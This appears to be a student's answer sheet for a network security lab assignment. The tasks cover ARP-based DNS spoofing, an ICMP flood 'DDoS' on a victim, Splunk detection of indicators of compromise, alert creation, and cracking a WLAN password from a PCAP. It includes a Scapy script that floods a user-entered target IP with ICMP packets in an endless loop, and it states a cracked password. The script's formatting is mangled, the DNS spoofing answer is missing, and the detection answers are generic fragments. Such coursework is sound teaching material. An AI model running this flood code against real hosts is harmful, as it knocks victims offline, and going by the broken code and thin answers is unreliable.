1. Use the arpspoof tool to perform the following attacks [10 Marks]

a. Use ARP packets to perform the DNS spoofing attack. Whatever the

website the user types, it should navigate to http://testphp.vulnweb.com/login.php as a part of the attack.

b. Use ICMP Packets to perform only DDOS attacks over the victim.

DNS spoof

TO perform DDOS attack on victim

from scapy.all import *

Function to send ICMP packets

def send_icmp_packet(dst_ip): icmp_packet = IP(dst=dst_ip)/ICMP() send(icmp_packet, loop=True, verbose=False)

Main function

def main(): target_ip = input("Enter the target IP address: ") while True: send_icmp_packet(target_ip)

if name == "main": main()

2. Use Splunk to answer the following questions:

a. Capture these above attacks using Splunk in an active or passive method.

Passive method

b. Identify and Analyse the Indicator of Compromise for the attack.

An Indicator of Compromise (IoC) is any piece of evidence or anomaly that suggests a network intrusion or security breach has occurred. IoCs can take various forms, including: File Hashes: Hash values of known malicious files or executables found on systems. IP Addresses: IP addresses associated with malicious activity, such as command and control servers or sources of malicious traffic. Domain Names: Domain names linked to malicious activities, phishing campaigns, or hosting malicious content. URLs: URLs used in phishing emails or websites hosting exploit kits or malware payloads. File Paths: Unusual file paths or directories commonly used by malware for persistence or data exfiltration. Network Traffic Patterns: Anomalous network traffic, such as unusual spikes in DNS queries, connections to known malicious IP addresses, or unexpected outbound traffic. System Logs: Suspicious entries in system logs, including failed login attempts, privilege escalations, or unusual system activities. For DNS Spoofing Attack IOC can be : DNS Log Analysis and DNS Traffic Analysis File Hash, Suspicious IP Address and anamoulous Login Activity

c. Explore and create an Alert for similar attacks in the Future.

first selecting due to which incident the attack is generated Select Monitoring tool Create alerts. Test the alerts Fine- Tuning the alert Document the alert rules which are craftes Continuous Improvement.

3. Use the given PCAP file to analyse and answer the following questions: a. Decrypt the traffic by cracking the password using appropriate tools and techniques. It is a must to mention briefly your method of cracking the password in the documentation. [HINT: password length – 16, Capital letter – 2, numerals – 6, It is a repetition of the same word as [CyberCyber].

Password Cracked: Cisco123Cisco123

b. Analyse the decrypted traffic using tools to identify the malicious/suspicious activity recorded in the WLAN.